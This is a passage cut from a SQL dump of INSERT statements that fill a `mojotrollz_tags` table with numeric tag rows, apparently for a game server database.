`table`, `type`, `value`, `comment`) VALUES (16929, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16930, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16930, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16930, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16930, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16930, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16931, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16931, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16931, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16931, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16931, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16932, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16932, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16932, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16932, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16932, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16933, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16933, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16933, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16933, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16933, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16934, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16934, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16934, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16934, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16934, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16935, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16935, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16935, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16935, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16935, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16936, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16936, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16936, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16936, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16936, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16937, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16937, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16937, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16937, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16937, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16938, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16938, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16938, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16938, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16938, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16939, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16939, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16939, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16939, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16939, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16940, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16940, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16940, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16940, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16940, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16941, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16941, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16941, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16941, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16941, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16942, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16942, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16942, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16942, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16942, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16943, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16943, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16943, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16943, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16943, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16944, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16944, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16944, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16944, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16944, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16945, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16945, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16945, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16945, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16945, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16946, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16946, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16946, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16946, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16946, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16947, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16947, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16947, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16947, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16947, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16948, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16948, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16948, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16948, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16948, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16949, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16949, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16949, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16949, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16949, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16950, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16950, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16950, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16950, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16950, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16951, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16951, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16951, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16951, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16951, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16952, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16952, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16952, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16952, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16952, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16953, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16953, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16953, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16953, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16953, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16954, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16954, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16954, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16954, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16954, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16955, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16955, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16955, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16955, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16955, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16956, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16956, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16956, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16956, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16956, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16957, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16957, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16957, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16957, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16957, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16958, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16958, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16958, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16958, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16958, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16959, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16959, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16959, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16959, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16959, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16960, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16960, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16960, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16960, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16960, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16961, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16961, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16961, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16961, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16961, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16962, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16962, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16962, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16962, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16962, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16963, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16963, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16963, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16963, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16963, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16964, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16964, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16964, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16964, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16964, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16965, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16965, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16965, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16965, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16965, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16966, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16966, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16966, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16966, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16966, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17188, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17189, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17190, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17192, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18005, 3, 21, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22416, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22416, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22416, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22416, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22416, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22417, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22417, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22417, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22417, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22417, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22418, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22418, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22418, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22418, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22418, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22419, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22419, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22419, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22419, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22419, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22420, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22420, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22420, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22420, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22420, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22421, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22421, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22421, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22421, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22421, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22422, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22422, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22422, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22422, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22422, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22423, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22423, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22423, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22423, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22423, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22424, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22424, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22424, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22424, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22424, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22425, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22425, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22425, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22425, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22425, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22426, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22426, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22426, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22426, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22426, 3, 21, 50, NULL); INSERT INTO 